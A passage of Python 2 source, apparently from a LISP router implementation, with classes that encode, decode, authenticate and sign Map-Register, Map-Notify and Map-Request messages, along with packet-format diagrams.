# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | |
# +- ... xTR router-ID ... -+
# | |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# +- ... xTR site-ID ... -+
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# kid are 1 of 8 values that describe the encryption key-id used for
# encrypting Map-Register messages.When the Map-Register is encrypted, the
# entire message not including the first 4 bytes are chacha20 encrypted. The
# e-bit must be set by the ETR to indicate that the Map-Register was encrypted.
#
class lisp_map_register():
def __init__(self):
self.proxy_reply_requested = False
self.lisp_sec_present = False
self.xtr_id_present = False
self.map_notify_requested = False
self.mobile_node = False
self.merge_register_requested = False
self.use_ttl_for_timeout = False
self.map_register_refresh = False
self.record_count = 0
self.nonce = 0
self.alg_id = 0
self.key_id = 0
self.auth_len = 0
self.auth_data = 0
self.xtr_id = 0
self.site_id = 0
self.record_count = 0
self.sport = 0
self.encrypt_bit = 0
self.encryption_key_id = None
#enddef
def print_map_register(self):
xtr_id = lisp_hex_string(self.xtr_id)
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}")
lprint(line.format(bold("Map-Register", False), \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_ttl_for_timeout else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node else "m",
"N" if self.map_notify_requested else "n",
"F" if self.map_register_refresh else "f",
"E" if self.encrypt_bit else "e",
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, xtr_id, self.site_id))
#enddef
def encode(self):
first_long = (LISP_MAP_REGISTER << 28) | self.record_count
if (self.proxy_reply_requested): first_long |= 0x08000000
if (self.lisp_sec_present): first_long |= 0x04000000
if (self.xtr_id_present): first_long |= 0x02000000
if (self.map_register_refresh): first_long |= 0x1000
if (self.use_ttl_for_timeout): first_long |= 0x800
if (self.merge_register_requested): first_long |= 0x400
if (self.mobile_node): first_long |= 0x200
if (self.map_notify_requested): first_long |= 0x100
if (self.encryption_key_id != None):
first_long |= 0x2000
first_long |= self.encryption_key_id << 14
#endif
#
# Append zeroed authentication data so we can compute hash latter.
#
if (self.alg_id == LISP_NONE_ALG_ID):
self.auth_len = 0
else:
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN
#endif
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
packet = self.zero_auth(packet)
return(packet)
#enddef
def zero_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_data = ""
auth_len = 0
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
auth_len = struct.calcsize("QQI")
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
auth_len = struct.calcsize("QQQQ")
#endif
packet = packet[0:offset] + auth_data + packet[offset+auth_len::]
return(packet)
#enddef
def encode_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
auth_data = self.auth_data
packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.auth_len = socket.ntohs(self.auth_len)
self.proxy_reply_requested = True if (first_long & 0x08000000) \
else False
self.lisp_sec_present = True if (first_long & 0x04000000) else False
self.xtr_id_present = True if (first_long & 0x02000000) else False
self.use_ttl_for_timeout = True if (first_long & 0x800) else False
self.map_register_refresh = True if (first_long & 0x1000) else False
self.merge_register_requested = True if (first_long & 0x400) else False
self.mobile_node = True if (first_long & 0x200) else False
self.map_notify_requested = True if (first_long & 0x100) else False
self.record_count = first_long & 0xff
#
# Decode e-bit and key-id for Map-Register decryption.
#
self.encrypt_bit = True if first_long & 0x2000 else False
if (self.encrypt_bit):
self.encryption_key_id = (first_long >> 14) & 0x7
#endif
#
# Decode xTR-ID and site-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(orig_packet) == False): return([None, None])
#endif
packet = packet[format_size::]
#
# Parse authentication and zero out the auth field in the packet.
#
if (self.auth_len != 0):
if (len(packet) < self.auth_len): return([None, None])
if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
LISP_SHA_256_128_ALG_ID)):
lprint("Invalid authentication alg-id: {}".format(self.alg_id))
return([None, None])
#endif
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
format_size = struct.calcsize("QQI")
if (auth_len < format_size):
lprint("Invalid sha1-96 authentication length")
return([None, None])
#endif
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
format_size = struct.calcsize("QQQQ")
if (auth_len < format_size):
lprint("Invalid sha2-256 authentication length")
return([None, None])
#endif
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
else:
lprint("Unsupported authentication alg-id value {}".format( \
self.alg_id))
return([None, None])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
orig_packet = self.zero_auth(orig_packet)
packet = packet[self.auth_len::]
#endif
return([orig_packet, packet])
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
site_id = byte_swap_64(self.site_id)
packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQQ")
if (len(packet) < format_size): return([None, None])
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
self.site_id = byte_swap_64(site_id)
return(True)
#enddef
#endclass
# The Map-Notify/Map-Notify-Ack message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=4/5| Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_notify():
def __init__(self, lisp_sockets):
self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.etr_port = 0
self.retransmit_timer = None
self.lisp_sockets = lisp_sockets
self.retry_count = 0
self.record_count = 0
self.alg_id = LISP_NONE_ALG_ID
self.key_id = 0
self.auth_len = 0
self.auth_data = ""
self.nonce = 0
self.nonce_key = ""
self.packet = None
self.site = ""
self.map_notify_ack = False
self.eid_records = ""
self.eid_list = []
#enddef
def print_notify(self):
auth_data = binascii.hexlify(self.auth_data)
if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
auth_data = self.auth_data
elif (self.alg_id == LISP_SHA_256_128_ALG_ID and len(auth_data) != 64):
auth_data = self.auth_data
#endif
line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}")
lprint(line.format(bold("Map-Notify-Ack", False) if \
self.map_notify_ack else bold("Map-Notify", False),
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, auth_data))
#enddef
def zero_auth(self, packet):
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
#endif
packet += auth_data
return(packet)
#enddef
def encode(self, eid_records, password):
if (self.map_notify_ack):
first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
else:
first_long = (LISP_MAP_NOTIFY << 28) | self.record_count
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
if (self.alg_id == LISP_NONE_ALG_ID):
self.packet = packet + eid_records
return(self.packet)
#endif
#
# Run authentication hash across packet.
#
packet = self.zero_auth(packet)
packet += eid_records
hashval = lisp_hash_me(packet, self.alg_id, password, False)
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
self.auth_data = hashval
packet = packet[0:offset] + hashval + packet[offset + auth_len::]
self.packet = packet
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce_key = lisp_hex_string(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
packet = packet[format_size::]
self.eid_records = packet[self.auth_len::]
if (self.auth_len == 0): return(self.eid_records)
#
# Parse authentication and zero out the auth field in the packet.
#
if (len(packet) < self.auth_len): return(None)
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
format_size = struct.calcsize("I") + struct.calcsize("QHH")
packet = self.zero_auth(orig_packet[:format_size])
format_size += auth_len
packet += orig_packet[format_size::]
return(packet)
#enddef
#endclass
#
# Map-Request message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=1 |A|M|P|S|p|s|m|I|Reserved |L|D| IRC | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source-EID-AFI | Source EID Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI 1 | ITR-RLOC Address 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI n | ITR-RLOC Address n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / |N| Reserved | EID mask-len | EID-prefix-AFI |
# Rec +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Map-Reply Record ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | xTR-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When a Map-Request is signed, the hash is over the IPv6 CGA based EID,
# the Map-Request Nonce, and the EID-record. The signature is placed in
# the Source-EID as a LCAF JSON Type string of { "source-eid" : "<cga>",
# "signature-eid" : "<cga-of-signer>", "signature" : "<sig"> }.
#
# Generating private/public key-pairs via:
#
# openssl genpkey -algorithm RSA -out privkey.pem \
# -pkeyopt rsa_keygen_bits:2048
# openssl rsa -pubout -in privkey.pem -out pubkey.pem
#
# And use ecdsa.VerifyingKey.from_pem() after reading in file.
#
# xTR-ID is appended to the end of a Map-Request when a subscription request
# is piggybacked (when self.subscribe_bit is True).
#
class lisp_map_request():
def __init__(self):
self.auth_bit = False
self.map_data_present = False
self.rloc_probe = False
self.smr_bit = False
self.pitr_bit = False
self.smr_invoked_bit = False
self.mobile_node = False
self.xtr_id_present = False
self.local_xtr = False
self.dont_reply_bit = False
self.itr_rloc_count = 0
self.record_count = 0
self.nonce = 0
self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.itr_rlocs = []
self.keys = None
self.privkey_filename = None
self.map_request_signature = None
self.subscribe_bit = False
self.xtr_id = None
#enddef
def print_prefix(self):
if (self.target_group.is_null()):
return(green(self.target_eid.print_prefix(), False))
#endif
return(green(self.target_eid.print_sg(self.target_group), False))
#enddef
def print_map_request(self):
xtr_id = ""
if (self.xtr_id != None and self.subscribe_bit):
xtr_id = "subscribe, xtr-id: 0x{}, ".format(lisp_hex_string( \
self.xtr_id))
#endif
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")
lprint(line.format(bold("Map-Request", False), \
"A" if self.auth_bit else "a",
"D" if self.map_data_present else "d",
"R" if self.rloc_probe else "r",
"S" if self.smr_bit else "s",
"P" if self.pitr_bit else "p",
"I" if self.smr_invoked_bit else "i",
"M" if self.mobile_node else "m",
"X" if self.xtr_id_present else "x",
"L" if self.local_xtr else "l",
"D" if self.dont_reply_bit else "d", self.itr_rloc_count,
self.record_count, lisp_hex_string(self.nonce),
self.source_eid.afi, green(self.source_eid.print_address(), False),
" (with sig)" if self.map_request_signature != None else "",
self.target_eid.afi, green(self.print_prefix(), False), xtr_id))
keys = self.keys
for itr in self.itr_rlocs:
lprint(" itr-rloc: afi {} {}{}".format(itr.afi,
red(itr.print_address_no_iid(), False),
"" if (keys == None) else ", " + keys[1].print_keys()))
keys = None
#endfor
#enddef
def sign_map_request(self, privkey):
sig_eid = self.signature_eid.print_address()
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
self.map_request_signature = privkey.sign(sig_data)
sig = binascii.b2a_base64(self.map_request_signature)
sig = { "source-eid" : source_eid, "signature-eid" : sig_eid,
"signature" : sig }
return(json.dumps(sig))
#enddef
def verify_map_request_sig(self, pubkey):
sseid = green(self.signature_eid.print_address(), False)
if (pubkey == None):
lprint("Public-key not found for signature-EID {}".format(sseid))
return(False)
#endif
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
pubkey = binascii.a2b_base64(pubkey)
good = True
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
lprint("Invalid public-key in mapping system for sig-eid {}". \
format(self.signature_eid.print_address_no_iid()))
good = False
#endtry
if (good):
try:
good = key.verify(self.map_request_signature, sig_data)
except:
good = False
#endtry
#endif
passfail = bold("passed" if good else "failed", False)
lprint("Signature verification {} for EID {}".format(passfail, sseid))
return(good)
#enddef
def encode(self, probe_dest, probe_port):
first_long = (LISP_MAP_REQUEST << 28) | self.record_count
first_long = first_long | (self.itr_rloc_count << 8)
if (self.auth_bit): first_long |= 0x08000000
if (self.map_data_present): first_long |= 0x04000000
if (self.rloc_probe): first_long |= 0x02000000
if (self.smr_bit): first_long |= 0x01000000
if (self.pitr_bit): first_long |= 0x00800000
if (self.smr_invoked_bit): first_long |= 0x00400000
if (self.mobile_node): first_long |= 0x00200000
if (self.xtr_id_present): first_long |= 0x00100000
if (self.local_xtr): first_long |= 0x00004000
if (self.dont_reply_bit): first_long |= 0x00002000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
#
# Check if Map-Request is going to be signed. If so, encode json-string
# in source-EID field. Otherwise, just encode source-EID with instance-
# id in source-EID field.
#
encode_sig = False
filename = self.privkey_filename
if (filename != None and os.path.exists(filename)):
f = open(filename, "r"); key = f.read(); f.close()
try:
key = ecdsa.SigningKey.from_pem(key)
except:
return(None)
#endtry
json_string = self.sign_map_request(key)
encode_sig = True
elif (self.map_request_signature != None):
sig = binascii.b2a_base64(self.map_request_signature)
json_string = { "source-eid" : self.source_eid.print_address(),
"signature-eid" : self.signature_eid.print_address(),
"signature" : sig }
json_string = json.dumps(json_string)
encode_sig = True
#endif
if (encode_sig):
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
lcaf_len = socket.htons(len(json_string) + 2)
json_len = socket.htons(len(json_string))
packet += struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0,
lcaf_len, json_len)
packet += json_string
packet += struct.pack("H", 0)
else:
if (self.source_eid.instance_id != 0):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.source_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.source_eid.afi))
packet += self.source_eid.pack_address()
#endif
#endif
#
# For RLOC-probes, see if keys already negotiated for RLOC. If so,
# use them so a new DH exchange does not happen.
#
if (probe_dest):
if (probe_port == 0): probe_port = LISP_DATA_PORT
addr_str = probe_dest.print_address_no_iid() + ":" + \
str(probe_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]
#endif
#endif
#
# If security is enabled, put security parameters in the first
# ITR-RLOC.
#
for itr in self.itr_rlocs:
if (lisp_data_plane_security and self.itr_rlocs.index(itr) == 0):
if (self.keys == None or self.keys[1] == None):
keys = lisp_keys(1)
self.keys = [None, keys, None, None]
#endif
keys = self.keys[1]
keys.add_key_by_nonce(self.nonce)
packet += keys.encode_lcaf(itr)
else:
packet += struct.pack("H", socket.htons(itr.afi))
packet += itr.pack_address()
#endif
#endfor
mask_len = 0 if self.target_eid.is_binary() == False else \
self.target_eid.mask_len
subscribe = 0
if (self.subscribe_bit):
subscribe = 0x80
self.xtr_id_present = True
if (self.xtr_id == None):
self.xtr_id = random.randint(0, (2**128)-1)
#endif
#endif
packet_format = "BB"
packet += struct.pack(packet_format, subscribe, mask_len)
if (self.target_group.is_null() == False):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_sg(self.target_group)
elif (self.target_eid.instance_id != 0 or
self.target_eid.is_geo_prefix()):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.target_eid.afi))
packet += self.target_eid.pack_address()
#endif
#
# If this is a subscription request, append xTR-ID to end of packet.
#
if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
return(packet)
#enddef
def lcaf_decode_json(self, packet):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)
#
# Do lcaf-length and json-length checks first.
#
lcaf_len = socket.ntohs(lcaf_len)
json_len = socket.ntohs(json_len)
packet = packet[format_size::]
if (len(packet) < lcaf_len): return(None)
if (lcaf_len != json_len + 2): return(None)
#
# Pull out JSON string from packet.
#
try:
json_string = json.loads(packet[0:json_len])
except:
return(None)
#endtry
packet = packet[json_len::]
#
# Get JSON encoded afi-address in JSON, we are expecting AFI of 0.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0): return(packet)
#
# Store JSON data internally.
#
if (json_string.has_key("source-eid") == False): return(packet)
eid = json_string["source-eid"]
afi = LISP_AFI_IPV4 if eid.count(".") == 3 else LISP_AFI_IPV6 if \
eid.count(":") == 7 else None
if (afi == None):
lprint("Bad JSON 'source-eid' value: {}".format(eid))
return(None)
#endif
self.source_eid.afi = afi
self.source_eid.store_address(eid)
if (json_string.has_key("signature-eid") == False): return(packet)
eid = json_string["signature-eid"]
if (eid.count(":") != 7):
lprint("Bad JSON 'signature-eid' value: {}".format(eid))
return(None)
#endif
self.signature_eid.afi = LISP_AFI_IPV6
self.signature_eid.store_address(eid)
if (json_string.has_key("signature") == False): return(packet)
sig = binascii.a2b_base64(json_string["signature"])
self.map_request_signature = sig
return(packet)
#enddef
def decode(self, packet, source, port):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.auth_bit = True if (first_long & 0x08000000) else False
self.map_data_present = True if (first_long & 0x04000000) else False
self.rloc_probe = True if (first_long & 0x02000000) else False
self.smr_bit = True if (first_long & 0x01000000) else False
self.pitr_bit = True if (first_long & 0x00800000) else False
self.smr_invoked_bit = True if (first_long & 0x00400000) else False
self.mobile_node = True if (first_long & 0x00200000) else False
self.xtr_id_present = True if (first_long & 0x00100000) else False
self.local_xtr = True if (first_long & 0x00004000) else False
self.dont_reply_bit = True if (first_long & 0x00002000) else False
self.itr_rloc_count = ((first_long >> 8) & 0x1f) + 1
self.record_count = first_long & 0xff
self.nonce = nonce[0]
#
# Decode xTR-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(packet) == False): return(None)
#endif
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])
self.source_eid.afi = socket.ntohs(afi[0])
packet = packet[format_size::]
if (self.source_eid.afi == LISP_AFI_LCAF):
save_packet = packet
packet = self.source_eid.lcaf_decode_iid(packet)
if (packet == None):
packet = self.lcaf_decode_json(save_packet)
if (packet == None): return(None)
#endif
elif (self.source_eid.afi != LISP_AFI_NONE):
packet = self.source_eid.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source_eid.mask_len = self.source_eid.host_mask_len()
no_crypto = (os.getenv("LISP_NO_CRYPTO") != None)
self.itr_rlocs = []
while (self.itr_rloc_count != 0):
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr = lisp_address(LISP_AFI_NONE, "", 32, 0)
itr.afi = socket.ntohs(afi)
#
# If Security Type LCAF, get security parameters and store in
# lisp_keys().
#
if (itr.afi != LISP_AFI_LCAF):
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
#
# Decide if we should remove security key state if ITR decided
# to stop doing key exchange when it previously had.
#
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
rloc_keys = lisp_crypto_keys_by_rloc_decap
if (rloc_keys.has_key(addr_str)): rloc_keys.pop(addr_str)
#
# If "ipc-data-plane = yes" is configured, we need to tell the
# data-plane from the lisp-etr process there is no longer a
# decryption key.
#
lisp_write_ipc_decap_key(addr_str, None)
else:
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC or
decode_key.cipher_suite == LISP_CS_25519_GCM):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_curve=False,
do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr.afi = socket.ntohs(afi)
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
stored_key = None
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_decap[addr_str]
stored_key = keys[1] if keys and keys[1] else None
#endif
new = True
if (stored_key):
if (stored_key.compare_keys(key)):
self.keys = [None, stored_key, None, None]
lprint("Maintain stored decap-keys for RLOC {}". \
format(red(addr_str, False)))
else:
new = False
remote = bold("Remote decap-rekeying", False)
lprint("{} for RLOC {}".format(remote, red(addr_str,
False)))
key.copy_keypair(stored_key)
key.uptime = stored_key.uptime
stored_key = None
#endif
#endif
if (stored_key == None):
self.keys = [None, key, None, None]
